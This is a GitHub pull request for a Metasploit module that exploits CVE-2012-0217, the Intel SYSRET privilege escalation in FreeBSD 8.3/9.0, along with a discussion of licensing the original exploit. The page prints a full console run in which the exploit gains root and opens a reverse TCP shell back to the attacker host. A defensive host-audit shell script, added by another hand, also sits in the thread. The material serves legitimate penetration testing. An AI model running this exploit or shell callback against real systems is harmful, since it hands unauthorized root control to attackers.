
Add FreeBSD 8.3 / 9.0 Intel SYSRET Privilege Escalation module #11092

Merged
merged 5 commits into from Mar 7, 2019

7 participants
bcoles commented Dec 9, 2018

Add FreeBSD 9 Intel SYSRET Privilege Escalation module.

Lazy wrapper for CurcolHekerLink's iZsh's exploit. I realize we already have the mmap exploit, which covers FreeBSD 9.0 and 9.1, but it's nice to have options.

The payload isn't strictly required. The exploit upgrades the privileges of the current task, and by the time the payload executes we're already root. Given that there's no Meterpreter for BSD, this should never be a problem.

  msf5 > use exploit/freebsd/local/intel_sysret_priv_esc 
  msf5 exploit(freebsd/local/intel_sysret_priv_esc) > set session 1
  session => 1
  msf5 exploit(freebsd/local/intel_sysret_priv_esc) > set lhost 123.123.123.188
  lhost => 123.123.123.188
  msf5 exploit(freebsd/local/intel_sysret_priv_esc) > run
  [!] SESSION may not be compatible with this module.
  [*] Started reverse TCP handler on 123.123.123.188:4444 
  [+] FreeBSD version 9.0-RELEASE appears vulnerable
  [+] System architecture amd64 is supported
  [+] hw.model: Intel(R) Core(TM) i9-1337 CPU @ 9.99GHz is vulnerable
  [*] Writing '/tmp/.mTaR4rAPd.c' (4781 bytes) ...
  [*] Max line length is 131073
  [*] Writing 4781 bytes in 1 chunks of 17475 bytes (octal-encoded), using printf
  [*] Writing '/tmp/.LBGkIVh' (218 bytes) ...
  [*] Max line length is 131073
  [*] Writing 218 bytes in 1 chunks of 614 bytes (octal-encoded), using printf
  [*] Launching exploit...
  [*] CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
  [*] 
  [*] [*] Retrieving host information...
  [*]     [+] CPU: GenuineIntel
  [*]     [+] sysname: FreeBSD
  [*]     [+] release: 9.0-RELEASE
  [*]     [+] version: FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
  [*]     [+] machine: amd64
  [*] [*] Validating target OS and version...
  [*]     [+] Vulnerable :-)
  [*] [*] Resolving kernel addresses...
  [*]     [+] Resolved Xofl to 0xffffffff80b02e70
  [*]     [+] Resolved Xbnd to 0xffffffff80b02ea0
  [*]     [+] Resolved Xill to 0xffffffff80b02ed0
  [*]     [+] Resolved Xdna to 0xffffffff80b02f00
  [*]     [+] Resolved Xpage to 0xffffffff80b03240
  [*]     [+] Resolved Xfpu to 0xffffffff80b02fc0
  [*]     [+] Resolved Xalign to 0xffffffff80b03080
  [*]     [+] Resolved Xmchk to 0xffffffff80b02f60
  [*]     [+] Resolved Xxmm to 0xffffffff80b02ff0
  [*] [*] Setup...
  [*]     [+] Trigger code...
  [*]     [+] Trampoline code...
  [*] [*] Fire in the hole!
  [*] [*] Got root!
  [+] Success! Executing payload...
  [*] Command shell session 2 opened (123.123.123.188:4444 -> 123.123.123.136:61024) at 2018-12-09 10:40:16 -0500
  [+] Deleted /tmp/.mTaR4rAPd.c
  [+] Deleted /tmp/.mTaR4rAPd
  [+] Deleted /tmp/.LBGkIVh
  id
  uid=0(root) gid=0(wheel) groups=0(wheel)
  uname -a
  FreeBSD freebsd-9-0 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64

@bcoles bcoles added docs and removed needs-docs labels Dec 9, 2018

jmartin-r7 commented Dec 11, 2018

@msjenkins-r7 test this please.

@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Dec 13, 2018

Closer inspection reveals this exploit was likely stolen from @iZsh from fail0verflow. CurcolHekerLink's exploit was posted to EDB in 2013. iZsh's exploit and accompanying analysis are very similar and predate the exploit by about a year:

The original blog publish date is 2012-07-05. The Web Archive page does not have a backup from this date, but the YouTube video confirms the date, as does the commit date on GitHub.

Unfortunately, the exploit is not licensed, and the copyright infringement punishment is undesirable:

// CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
// Copyright 2012 all right reserved, not for commercial uses, bitches
// Infringement Punishment: Monkeys coming out of your ass Bruce Almighty style.

I would prefer to use the original work. I've updated the module in my local repo, and asked iZsh for permission to use the original exploit. Adding delayed tag for now.

@bcoles bcoles added the delayed label Dec 13, 2018

@bcoles bcoles added attic and removed delayed labels Dec 21, 2018

bcoles commented Dec 21, 2018

Adding attic tag pending approval from @iZsh.

@bcoles bcoles closed this Dec 21, 2018

iZsh commented Jan 11, 2019

Sorry, I hadn't noticed your email. Your fear of my license punishment made my day ;-)

You have my approval to use my exploit in metasploit.

@bcoles bcoles reopened this Jan 11, 2019

@bcoles bcoles removed the attic label Jan 11, 2019

@bcoles bcoles changed the title Add FreeBSD 9 Intel SYSRET Privilege Escalation module Add FreeBSD 8.3 / 9.0 Intel SYSRET Privilege Escalation module Jan 11, 2019

busterb commented Jan 11, 2019

This is the best!

@busterb busterb self-assigned this Mar 7, 2019

busterb commented Mar 7, 2019

Darn it, I started checking this earlier, verified it works, but got distracted before landing. Moving forward with that now. Thanks @bcoles

@busterb busterb merged commit 983b39a into rapid7:master Mar 7, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed

busterb added a commit that referenced this pull request Mar 7, 2019

msjenkins-r7 added a commit that referenced this pull request Mar 7, 2019

busterb commented Mar 7, 2019

Release Notes

The freebsd/local/intel_sysret_priv_esc exploit module has been added to the framework. This local privilege escalation exploit module targets a vulnerability in the FreeBSD kernel when running on 64-bit Intel processors, leveraging a mishandled edge case with the SYSRET instruction.
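For administrators who want to find hosts that match the target profile this module checks before launching (release, architecture, CPU vendor, as seen in the session output above), here is an added audit helper; it is not part of the Metasploit module or the exploit. It assumes the profile from the PR title (8.3 / 9.0 on amd64 with an Intel CPU) and does not inspect the patch level, so a match means "verify the host against the FreeBSD advisory for CVE-2012-0217", not "confirmed vulnerable".

```shell
#!/bin/sh
# Added audit helper (not the module's own code). Reproduces the three
# pre-flight checks the module output shows so an administrator can list
# hosts that match its target profile. Assumptions: target releases are
# 8.3 and 9.0 (PR title); only amd64 on Intel CPUs is in scope, because the
# SYSRET edge case (CVE-2012-0217) is Intel-specific and AMD is unaffected.
# Patch level is deliberately not parsed: a match is a prompt to check the
# FreeBSD advisory for CVE-2012-0217, not a verdict.

# Usage: sysret_profile_match RELEASE MACHINE HW_MODEL
# Returns 0 when all three checks match the module's target profile, else 1.
sysret_profile_match() {
    release="$1"; machine="$2"; hw_model="$3"
    case "$release" in
        8.3-*|9.0-*) ;;            # FreeBSD 8.3 / 9.0, any patch level
        *) return 1 ;;
    esac
    [ "$machine" = "amd64" ] || return 1   # 64-bit kernel only
    case "$hw_model" in
        *Intel*) return 0 ;;       # hw.model names the CPU vendor
        *) return 1 ;;
    esac
}

# Reports on the local host using the same sources the module reads
# (uname for release/machine, sysctl hw.model for the CPU string).
sysret_report_local() {
    rel=$(uname -r)
    mach=$(uname -m)
    model=$(sysctl -n hw.model 2>/dev/null || echo unknown)
    if sysret_profile_match "$rel" "$mach" "$model"; then
        echo "MATCH: $rel $mach '$model' -- confirm CVE-2012-0217 patch status"
    else
        echo "no match: $rel $mach '$model'"
    fi
}

sysret_report_local
```

Run it over the output of `uname -r`, `uname -m` and `sysctl -n hw.model` collected from a fleet to get a list of hosts worth checking; anything that matches but is already at a patched level is a false positive by design.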

@bcoles bcoles deleted the bcoles:intel_sysret_priv_esc branch Mar 7, 2019

busterb commented Mar 12, 2019

And just as a verification that this does indeed upgrade the privileges of the current task, here's before and after running bsd/x64/shell_reverse_tcp

%whoami
vagrant
%/tmp/test.elf 
^C
%whoami
root
%